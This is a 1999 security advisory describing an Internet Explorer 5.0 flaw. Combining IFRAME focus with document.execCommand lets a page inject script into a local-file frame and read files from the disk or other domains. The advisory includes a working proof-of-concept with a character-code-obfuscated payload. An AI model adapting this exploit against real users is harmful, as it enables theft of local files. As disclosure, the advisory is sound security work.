IE5_IFRAME_vuln.txt

1999-10-15T00:00:00
ID PACKETSTORM:11730
Type packetstorm
Reporter Georgi Guninski
Modified 1999-10-15T00:00:00

Description

                                        
                                            `IE 5.0 security vulnerability - reading local (and from any domain,  
probably window spoofing is possible) files using IFRAME and  
document.execCommand  
  
Disclaimer:  
The opinions expressed in this advisory and program are my own and not  
of any company.  
The usual standard disclaimer applies, especially the fact that Georgi  
Guninski  
is not liable for any damages caused by direct or indirect use of the  
information or functionality provided by this program.  
Georgi Guninski, bears NO responsibility for content or misuse of this  
program or any derivatives thereof.  
  
Description:  
  
Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (suppose Win98 is  
vulnerable)  
allows reading local files, text and HTML files from any domain and  
probably window spoofing (have not tested window spoofing but believe it  
is possible)  
It is also possible in some cases to read files behind fiewall.  
  
Details:  
  
The problem is the combination of IFRAME and document.execCommand.  
Normally, you cannot use execCommand on an IFRAME from another domain.  
But if you do:  
"IFRAME.focus(); document.execCommand" then command will be executed in  
the IFRAME  
(some commands do not work in this way, but some do and that is enough).  
So, we create an IFRAME with SRC="file://c:/test.txt" and inject  
JavaScript code in it. When the  
JavaScript code is executed, it is executed in the security context of  
the IFRAME - the "file:" protocol.  
The injection is done using the "InsertParagraph" command (guess other  
commands will do) which sets the ID of the paragraph.  
But if you place a " in the ID, then a STYLE tag may be inserted also.  
The JavaScript code is injected using the STYLE tag:  
STYLE="left:expression(eval(JSCode))"  
This vulnerability may be exploited using HTML email message or a  
newsgroup posting.  
  
The code is:  
----------------------------------------------------------------------------------------  
<SCRIPT>  
alert("Create text file c:\\test.txt and it will be read");  
function f()  
{  
I1.focus();  
document.execCommand("selectAll");  
document.execCommand("InsertParagraph",false,">\"STYLE='left:expression(eval(String.fromCharCode(97,61,119,105,110,100,111,119,46,111,112,101,110,40,39,102,105,108,101,58,47,47,99,58,47,116,101,115,116,46,116,120,116,39,41,59,97,108,101,114,116,40,97,46,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,84,101,120,116,41)));'");  
}  
setTimeout('f()',2000);  
</SCRIPT>  
<IFRAME ID="I1" SRC="file://c:/test.txt"></IFRAME>  
----------------------------------------------------------------------------------------  
  
  
Workaround:  
Disable Active Scripting  
  
Demonstration is available at http://www.nat.bg/~joro/execcommand.html  
  
  
Regards,  
Georgi Guninski  
http://www.nat.bg/~joro  
`